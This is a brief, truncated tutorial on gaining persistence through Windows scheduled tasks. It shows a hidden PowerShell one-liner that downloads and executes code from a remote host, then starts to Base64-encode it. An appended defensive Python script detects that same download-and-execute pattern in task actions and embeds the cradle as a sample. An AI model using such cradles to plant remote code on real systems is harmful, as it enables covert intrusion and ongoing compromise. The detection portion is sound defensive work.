Persistence Ways (the adversary is trying to maintain their foothold)
Persistence is gaining continued access to a computer system or network that has already been compromised. It requires bypassing security measures and reconfiguring systems so that access is maintained even after users log out or the system reboots. This kind of access can be difficult to achieve, because the security measures designed to prevent initial access must be circumvented again to keep the access persistent.
Persistence can be achieved by executing in userland, as the current user, or by using a higher privilege such as SYSTEM.
Let's look at some techniques:
Scheduled Tasks (T1053.005)
a. Create a PowerShell Scripted Web Delivery URL:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.35.130:80/a'))"
b. Then we can Base64-encode this:
$s = 'IEX ((new-object…
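As an added defender-side example (not part of the original post), here is a Python triage script that scans scheduled-task actions for the pattern above: hidden, no-profile PowerShell carrying a web-delivery cradle, including the Base64 -EncodedCommand form from step b, which it decodes before inspecting. The sample task rows and task names are constructed for the example.

```python
import base64
import re
# Argument patterns that together indicate a hidden PowerShell download cradle launched from a task.
SUSPICIOUS_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}
CRADLE = re.compile(r"\b(IEX|Invoke-Expression)\b.*\b(downloadstring|net\.webclient)\b", re.I)

def decode_encoded_command(b64):
    """-EncodedCommand carries Base64 of UTF-16LE text; return it, or None if invalid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyse_task_action(action):
    """Triage one task's 'Task To Run' string: flag hits, decoded script, verdict."""
    hits, decoded = [], None
    if re.search(r"powershell(?:\.exe)?", action, re.I):
        for name, pattern in SUSPICIOUS_FLAGS.items():
            m = pattern.search(action)
            if m:
                hits.append(name)
                if name == "encoded_command":
                    decoded = decode_encoded_command(m.group(1))
        # The cradle may sit in the clear (-c "...") or only inside the decoded blob.
        if CRADLE.search(action) or (decoded and CRADLE.search(decoded)):
            hits.append("download_cradle")
    # Heuristic: a cradle is decisive; otherwise two or more stealth flags warrant review.
    return {"hits": hits, "decoded": decoded,
            "suspicious": "download_cradle" in hits or len(hits) >= 2}

def scan_tasks(tasks):
    """Return names of tasks whose action matches this persistence pattern."""
    return [name for name, action in tasks if analyse_task_action(action)["suspicious"]]

def to_encoded_command(script):
    """Base64(UTF-16LE) form of a script; used here only to build the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample in the shape of `schtasks /query /v /fo csv` (TaskName, Task To Run).
PAGE_CRADLE = "IEX ((new-object net.webclient).downloadstring('http://192.168.35.130:80/a'))"
SAMPLE_TASKS = [
    ("\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", r"%windir%\system32\defrag.exe -c -h -k -g -$"),
    ("\\Backup", r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ("\\Updater", f'powershell.exe -nop -w hidden -c "{PAGE_CRADLE}"'),
    ("\\UpdaterEnc", "powershell.exe -nop -w hidden -enc " + to_encoded_command(PAGE_CRADLE)),
]
```

On a live host the same rows come from `schtasks /query /v /fo csv` or Event ID 4698 (task created), which is where the detection belongs.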